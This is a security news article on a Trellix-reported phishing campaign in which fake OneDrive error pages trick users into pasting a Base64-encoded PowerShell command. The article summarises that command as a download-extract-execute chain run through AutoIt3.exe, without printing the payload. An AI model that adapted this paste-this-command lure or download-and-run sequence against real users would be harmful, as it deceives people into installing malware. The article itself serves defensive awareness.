OneDrive Users Targeted in Sophisticated Phishing and Downloader Campaign
Microsoft OneDrive users are being targeted in a new and sophisticated phishing campaign that leverages social engineering to trick victims into executing malicious PowerShell scripts. Trellix Advanced Research Center has identified this campaign, which uses fake OneDrive error messages to lure users into downloading malware.
The attack begins with an email containing a malicious HTML file. Upon opening, the file displays a convincing OneDrive page with a fabricated error message. This message claims a DNS issue prevents access to a file and prompts the user to click on a “How to fix” button.
Microsoft OneDrive page with “Error 0x8004de86” | Image: Trellix
The “How to fix” button triggers a hidden script that copies a malicious command to the user’s clipboard. The user is then instructed to open PowerShell and execute this command, which downloads and runs malware disguised as a legitimate file.
Window appearance after pressing “How to fix” button | Image: Trellix
The user is then instructed to open the Quick Link menu (Windows Key + X), access the Windows PowerShell terminal, paste a command, and execute it. This command, partially encoded in Base64, performs several actions:
- Flushes the DNS cache with
ipconfig /flushdns. - Creates a folder named “downloads” on the C: drive.
- Downloads an archive file into this folder, renames it, extracts its contents, and executes the extracted script using AutoIt3.exe.
- Displays a message: “The operation completed successfully, please reload the page.”
This campaign primarily exploits user trust and urgency through social engineering. The sophisticated use of HTML files, embedded JavaScript, and the simulation of legitimate error messages highlight the lengths to which attackers will go to deceive their victims.
Trellix has observed this campaign targeting OneDrive users globally. The potential impact on individuals and businesses is significant, as the malware can lead to data breaches, financial losses, and reputational damage.
By preying on users’ emotions and trust, attackers can penetrate even the most secure environments. Enterprises must remain vigilant, continuously educating their workforce and reinforcing security measures to defend against such sophisticated attacks.
